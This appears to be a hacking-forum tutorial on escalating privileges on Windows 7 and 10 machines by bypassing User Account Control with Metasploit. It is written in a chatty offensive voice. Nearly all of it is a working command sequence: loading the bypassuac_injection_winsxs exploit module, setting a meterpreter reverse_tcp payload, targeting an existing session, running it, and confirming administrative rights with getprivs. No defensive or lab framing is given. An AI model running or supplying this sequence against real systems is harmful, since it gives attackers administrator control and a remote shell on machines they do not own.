The way I see it, the most common ways to pull this off are by finding the weak spots, the dodgy setups, and the downright vulnerabilities in the system.
---------------------------------------------------------
Privilege Escalation on Windows:
Our goal here is to get a bit more juice on those Windows systems we're working with. We're talking about elevating our privileges.
---------------------------------------------------------
Requirements:
- Kali Linux or Parrot OS
UAC BYPASS
If you're looking to get a bit more clout on the system, you can try bypassing that whole User Account Control (UAC) business. See, Windows has this thing called UAC that lets programs boost their permissions, from low to high, to do their thing. But sometimes, you can skip past that whole user confirmation rigmarole and just get the job done.
Did you know Metasploit's got a bunch of handy dandy modules for bypassing that whole User Account Control (UAC) business? Reckon we can use those to really boost our permissions on those Windows 7 and Windows 10 systems.
Code: Select all
meterpreter> background
To get the ball rolling, all you gotta do is run a quick search. Just fire up that terminal and type:
Code: Select all
msf> search bypassuac
After having a gander at the options, it looks like the "bypassuac_injection_winsxs" module is the way to go for us. See, it's the only one that's been proven to work a treat on those Windows 10 systems:
Load the bypass UAC module typing this command:
Code: Select all
msf> use module exploit/windows/local/bypassuac_injection_winsxs
Now that we've got that UAC bypass module all loaded up, it's time to get it configured just right. We'll need to run a few quick commands to make sure everything's shipshape:
Code: Select all
msf> set payload windows/x64/meterpreter/reverse_tcp
Code: Select all
msf> set target WIndows x64
Code: Select all
msf> set SESSION <SESSION-ID>
We've got the module all set up, for execute the module, type:
Code: Select all
msf> run
If all went according to plan, we should be seeing an elevated meterpreter session on that target system:
Let's take a quick peek under the hood and see what kind of permissions we're rocking with this elevated session. We can do that by running a simple command in the meterpreter:
Code: Select all
meterpreter> getprivs
Turns out we've got the whole kit and caboodle - administrative privileges.